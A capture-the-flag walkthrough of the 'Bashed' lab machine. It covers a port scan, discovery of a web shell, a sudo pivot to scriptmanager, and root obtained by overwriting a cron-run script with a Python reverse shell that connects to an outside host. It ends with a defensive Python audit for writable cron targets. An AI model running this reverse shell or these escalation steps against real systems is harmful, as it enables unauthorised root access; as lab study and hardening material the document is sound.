The nmap scan reveals only one port: port 80 with an Apache web server.

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Arrexel's Development Site
|_http-server-header: Apache/2.4.18 (Ubuntu)
Visiting the website, we see a PHP development page with some kind of blog.
php/sendMail POST endpoint, but we cannot see the response. Next, I ran a gobuster scan over the website and found some interesting directories:
/images (Status: 301) [Size: 315] [--> http://10.129.29.137/images/]
/uploads (Status: 301) [Size: 316] [--> http://10.129.29.137/uploads/]
/php (Status: 301) [Size: 312] [--> http://10.129.29.137/php/]
/css (Status: 301) [Size: 312] [--> http://10.129.29.137/css/]
/dev (Status: 301) [Size: 312] [--> http://10.129.29.137/dev/]
/js (Status: 301) [Size: 311] [--> http://10.129.29.137/js/]
/fonts (Status: 301) [Size: 314] [--> http://10.129.29.137/fonts/]
/server-status (Status: 403) [Size: 301]
The /dev/ directory leads to a webshell.
From there, we can get the user flag. Next, I ran LinEnum and LinPEAS to get some hints on how to move on.
sudo -l reveals that the user scriptmanager can run all commands without a password:

www-data@bashed:/tmp$ sudo -l
sudo -l
Matching Defaults entries for www-data on bashed:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on bashed:
    (scriptmanager : scriptmanager) NOPASSWD: ALL
And here, I made some mistakes. I tried to move to scriptmanager with
su, but this did not work as it’s prompting for the password I don’t have:
www-data@bashed:/tmp$ su scriptmanager -c bash
su scriptmanager -c bash
Password:
However, THIS one works:
www-data@bashed:/$ sudo -u scriptmanager /bin/bash
sudo -u scriptmanager /bin/bash
scriptmanager@bashed:/$
This enables us to enter the scripts folder, where we find a script that is apparently running every minute: it opens test.txt and writes to it, so that file's timestamp is constantly changing.

$ cat test.py
f = open("test.txt", "w")
f.write("testing 123!")
f.close
By replacing the script's content with a Python reverse shell, we get a root shell.
$ echo 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.28",4242));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")' > test.py
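The root shell above comes from a privileged scheduled job executing a script that a lower-privileged account owns and can rewrite. The following audit check is an added example (not part of the original writeup or the box); it takes a script path and the uid the job runs as, and reports ownership and permission conditions that would let another user modify or replace it. The demo builds a constructed copy of the scripts/test.py layout in a temporary directory and simulates the "job runs as a different uid" case with a made-up uid.

```python
from __future__ import annotations

import os
import stat
import tempfile
from pathlib import Path


def audit_cron_target(path: str, runs_as_uid: int = 0) -> list[str]:
    """Return findings for a script at `path` that a job executes as `runs_as_uid`."""
    p = Path(path)
    st, pst = p.stat(), p.parent.stat()
    findings = []
    # Bashed condition: root runs a file owned by a less privileged account.
    if st.st_uid != runs_as_uid:
        findings.append(f"{p}: owned by uid {st.st_uid} but executed as uid {runs_as_uid}")
    if st.st_mode & stat.S_IWOTH:
        findings.append(f"{p}: world-writable")
    elif st.st_mode & stat.S_IWGRP:
        findings.append(f"{p}: group-writable by gid {st.st_gid}")
    # A writable parent directory lets anyone replace the script wholesale,
    # unless the sticky bit restricts deletion/rename to the file's owner.
    if pst.st_mode & stat.S_IWOTH and not pst.st_mode & stat.S_ISVTX:
        findings.append(f"{p.parent}: world-writable directory without sticky bit")
    if pst.st_uid != runs_as_uid:
        findings.append(f"{p.parent}: directory owned by uid {pst.st_uid}, not {runs_as_uid}")
    return findings


def demo() -> dict[str, list[str]]:
    """Constructed layout mimicking scripts/test.py; returns findings per scenario."""
    me = os.getuid()
    other = me + 1  # simulated uid of the job (stands in for root vs. scriptmanager)
    results = {}
    with tempfile.TemporaryDirectory() as d:
        script = Path(d) / "test.py"
        script.write_text('f = open("test.txt", "w")\nf.write("testing 123!")\nf.close()\n')
        os.chmod(d, 0o755)
        os.chmod(script, 0o644)
        # Job runs as a different uid than the owner of the file and directory.
        results["owned_by_other_user"] = audit_cron_target(str(script), runs_as_uid=other)
        # Same, with loose file permissions on top.
        os.chmod(script, 0o666)
        results["world_writable"] = audit_cron_target(str(script), runs_as_uid=other)
        # Hardened: owner and executing uid match, nobody else can write.
        os.chmod(script, 0o644)
        results["hardened"] = audit_cron_target(str(script), runs_as_uid=me)
    return results
```

Pointing audit_cron_target at each script referenced from /etc/crontab and /etc/cron.d with the job's uid gives a quick inventory of cron targets that a non-root user could tamper with.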